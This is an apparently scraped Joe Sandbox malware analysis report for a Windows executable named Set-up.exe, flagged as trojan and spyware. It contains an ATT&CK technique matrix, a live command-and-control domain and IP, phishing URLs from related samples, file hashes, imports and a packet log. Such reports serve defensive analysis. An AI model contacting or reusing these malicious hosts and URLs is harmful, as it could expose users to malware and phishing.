Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0083A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_0083A550
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008CAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_008CAA30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0084E480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_0084E480
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory231
Security Software Discovery
Remote Desktop Protocol1
Data from Local System
4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
Obfuscated Files or Information
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
Process Discovery
Distributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync17
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://home.eleventh11vs.top/MTL0%Avira URL Cloudsafe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847http://home.eleventh11vs.top/MTL0%Avira URL Cloudsafe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW17355568479630%Avira URL Cloudsafe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW17355568470%Avira URL Cloudsafe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuX8470%Avira URL Cloudsafe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847fd40%Avira URL Cloudsafe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847?argument=00%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
home.eleventh11vs.top
194.87.58.155
truetrue
    unknown
    httpbin.org
    34.197.122.172
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847true
      • Avira URL Cloud: safe
      unknown
      http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847?argument=0true
      • Avira URL Cloud: safe
      unknown
      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlSet-up.exefalse
          high
          http://html4/loose.dtdSet-up.exefalse
            high
            https://curl.se/docs/alt-svc.html#Set-up.exefalse
              high
              https://httpbin.org/ipbeforeSet-up.exefalse
                high
                http://home.eleventh11vs.top/MTLSet-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://curl.se/docs/http-cookies.htmlSet-up.exefalse
                  high
                  https://curl.se/docs/hsts.html#Set-up.exefalse
                    high
                    http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuX847Set-up.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://curl.se/docs/alt-svc.htmlSet-up.exefalse
                      high
                      http://.cssSet-up.exefalse
                        high
                        http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847963Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://.jpgSet-up.exefalse
                          high
                          http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847http://home.eleventh11vs.top/MTLSet-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847fd4Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          194.87.58.155
                          home.eleventh11vs.topRussian Federation
                          2118RELCOM-ASRelcomGroup19022019RUtrue
                          34.197.122.172
                          httpbin.orgUnited States
                          14618AMAZON-AESUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1582491
                          Start date and time:2024-12-30 18:11:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Set-up.exe
                          Detection:MAL
                          Classification:mal60.troj.spyw.evad.winEXE@1/0@9/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 78%
                          • Number of executed functions: 49
                          • Number of non-executed functions: 147
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Excluded IPs from analysis (whitelisted): 52.149.20.212
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Set-up.exe
                          No simulations
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          httpbin.orgSet-up.exeGet hashmaliciousUnknownBrowse
                          • 52.73.63.247
                          a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                          • 3.218.7.103
                          SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                          • 34.226.108.155
                          TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                          • 3.218.7.103
                          FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                          • 3.218.7.103
                          ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                          • 3.218.7.103
                          e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                          • 3.218.7.103
                          HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                          • 34.226.108.155
                          A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                          • 3.218.7.103
                          QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                          • 34.226.108.155
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          RELCOM-ASRelcomGroup19022019RUSgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                          • 194.87.58.92
                          TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                          • 194.87.58.92
                          j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                          • 194.87.58.92
                          es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                          • 194.87.58.92
                          vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                          • 194.87.58.92
                          CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                          • 194.87.58.92
                          arm4.elfGet hashmaliciousUnknownBrowse
                          • 194.58.66.244
                          mips.elfGet hashmaliciousUnknownBrowse
                          • 194.58.66.131
                          ppc.elfGet hashmaliciousUnknownBrowse
                          • 194.58.66.244
                          hmips.elfGet hashmaliciousUnknownBrowse
                          • 194.58.66.131
                          AMAZON-AESUShttps://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                          • 3.88.121.169
                          https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                          • 3.88.121.169
                          securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                          • 44.219.110.92
                          https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                          • 3.208.228.173
                          botx.mips.elfGet hashmaliciousMiraiBrowse
                          • 52.0.196.218
                          botx.x86.elfGet hashmaliciousMiraiBrowse
                          • 34.206.198.108
                          botx.m68k.elfGet hashmaliciousMiraiBrowse
                          • 54.87.199.101
                          botx.ppc.elfGet hashmaliciousMiraiBrowse
                          • 54.56.4.115
                          botx.arm7.elfGet hashmaliciousMiraiBrowse
                          • 54.89.155.219
                          botx.mpsl.elfGet hashmaliciousMiraiBrowse
                          • 54.42.166.207
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Entropy (8bit):6.456874724928812
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.53%
                          • InstallShield setup (43055/19) 0.43%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Set-up.exe
                          File size:6'759'048 bytes
                          MD5:f54b04dcddb77fdc57b307e8ec7daea1
                          SHA1:16a21d6803565b513ade671ec344867bbe5ba97e
                          SHA256:e83c43a49d2ab2c53f73acef9ccf4c2dca23c2c4d149108724b2d7a9dbbd2f14
                          SHA512:f3ac35585174247a9f06831fcea12e163d421baec154f993dfb7431eb37ecac755723bc156886e23ff948ae9832241f605f430d9a76e179eb886a95251310ce1
                          SSDEEP:49152:ASv0XbOiCuFJ6FGyMBjifMcUchTo+ia4S+i9OnlxtdWUhri8g5uKVbYGPyz8E9+y:ASWYuFBymjiScNoPNXiqlPkuKdyz8S
                          TLSH:F5663B55EE8791F9DA8305715016B33F6E30AF009839CEB6CE94FB34C6B2A11E91E61D
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.rg...............(..I...g..2............I...@...........................g.......h...@... ............................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x4014a0
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x67728058 [Mon Dec 30 11:13:28 2024 UTC]
                          TLS Callbacks:0x7890e0, 0x789090
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:51b39aff649af7abc30a06f2362db069
                          Signature Valid:false
                          Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                          Signature Validation Error:A certificate chain could not be built to a trusted root authority
                          Error Number:-2146762486
                          Not Before, Not After
                          • 26/08/2024 17:01:06 21/08/2025 17:01:06
                          Subject Chain
                          • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                          Version:3
                          Thumbprint MD5:F617A6F3082EEC96B023751EF0945390
                          Thumbprint SHA-1:A41C84671DD36CC27BE4B30EDF1281ACFB2B7EE3
                          Thumbprint SHA-256:313D6596531456D10E79F77160793C03712B1157BFBCD32A25896C4F70AD8A0E
                          Serial:33009F7B734DB0480411EB0BBA0000009F7B73
                          Instruction
                          mov dword ptr [00A3F658h], 00000001h
                          jmp 00007FE7CC858606h
                          nop
                          mov dword ptr [00A3F658h], 00000000h
                          jmp 00007FE7CC8585F6h
                          nop
                          sub esp, 1Ch
                          mov eax, dword ptr [esp+20h]
                          mov dword ptr [esp], eax
                          call 00007FE7CCBDFE66h
                          cmp eax, 01h
                          sbb eax, eax
                          add esp, 1Ch
                          ret
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          push ebp
                          mov ebp, esp
                          push edi
                          push esi
                          push ebx
                          sub esp, 1Ch
                          mov dword ptr [esp], 008E6000h
                          call dword ptr [00A419A8h]
                          sub esp, 04h
                          test eax, eax
                          je 00007FE7CC8589C5h
                          mov ebx, eax
                          mov dword ptr [esp], 008E6000h
                          call dword ptr [00A41A1Ch]
                          mov edi, dword ptr [00A419BCh]
                          sub esp, 04h
                          mov dword ptr [00A3D028h], eax
                          mov dword ptr [esp+04h], 008E6013h
                          mov dword ptr [esp], ebx
                          call edi
                          sub esp, 08h
                          mov esi, eax
                          mov dword ptr [esp+04h], 008E6029h
                          mov dword ptr [esp], ebx
                          call edi
                          sub esp, 08h
                          mov dword ptr [0089B004h], eax
                          test esi, esi
                          je 00007FE7CC858963h
                          mov dword ptr [esp+04h], 00A3D02Ch
                          mov dword ptr [esp], 00A38104h
                          call esi
                          mov dword ptr [esp], 00401580h
                          call 00007FE7CC8588B3h
                          lea esp, dword ptr [ebp-0Ch]
                          pop ebx
                          pop esi
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6410000x2dac.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x671c000x688.reloc
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x6460000x3418c.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x62dd800x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x6418140x620.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x4997bc0x499800c3ba20095f0147867c77d5e85be8729funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x49b0000x4a0240x4a20016985c2fec27f2b7d6de9e4643b5a41eFalse0.07566136172006746dBase III DBT, version number 0, next free block index 10, 1st item "\360\315y"1.0025453738829009IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0x4e60000x151bb80x151c00d79f9c42170b8e3379d9dd3789e4112dFalse0.42098951586787564data6.278534667841207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .eh_fram0x6380000x4d640x4e000da6b4bfc58d4fd4901066a1fc4ecc9aFalse0.3194110576923077data4.922516941847443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .bss0x63d0000x31800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0x6410000x2dac0x2e002cdb7727c2a1da697f61163567e992b9False0.3688858695652174data5.435881261044204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .CRT0x6440000x300x200fe2a65d4187b984679c52ae93485940eFalse0.0625data0.2233456448570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .tls0x6450000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .reloc0x6460000x3418c0x3420024e9d0d0948bcf7e3b142592aa194977False0.4977939523381295data6.664300646722827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          DLLImport
                          ADVAPI32.dllCryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
                          bcrypt.dllBCryptGenRandom
                          CRYPT32.dllCertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
                          GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
                          gdiplus.dllGdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
                          IPHLPAPI.DLLConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
                          KERNEL32.dllAcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
                          msvcrt.dll__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
                          ole32.dllCreateStreamOnHGlobal
                          SHELL32.dllSHGetKnownFolderPath
                          api-ms-win-crt-convert-l1-1-0.dllatoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
                          api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
                          api-ms-win-crt-filesystem-l1-1-0.dll_fstat64, _stat64, _unlink
                          api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                          api-ms-win-crt-locale-l1-1-0.dllsetlocale
                          api-ms-win-crt-math-l1-1-0.dll_fdopen
                          api-ms-win-crt-private-l1-1-0.dllmemchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
                          api-ms-win-crt-runtime-l1-1-0.dll_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
                          api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
                          api-ms-win-crt-string-l1-1-0.dll_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
                          api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
                          api-ms-win-crt-utility-l1-1-0.dll_byteswap_uint64, bsearch, qsort, rand, srand
                          USER32.dllCharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
                          WS2_32.dllWSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 30, 2024 18:11:56.787899017 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:56.787925959 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:56.787998915 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:56.790901899 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:56.790916920 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:57.462285042 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:57.462937117 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:57.462954998 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:57.464148998 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:57.464215994 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:57.465452909 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:57.465519905 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:57.473123074 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:57.473130941 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:57.519103050 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:58.535973072 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:58.536058903 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:11:58.536111116 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:58.542640924 CET49730443192.168.2.434.197.122.172
                          Dec 30, 2024 18:11:58.542660952 CET4434973034.197.122.172192.168.2.4
                          Dec 30, 2024 18:12:00.289334059 CET4973180192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:00.294213057 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.294291973 CET4973180192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:00.295105934 CET4973180192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:00.299964905 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.299974918 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.299993038 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.300002098 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.300017118 CET8049731194.87.58.155192.168.2.4
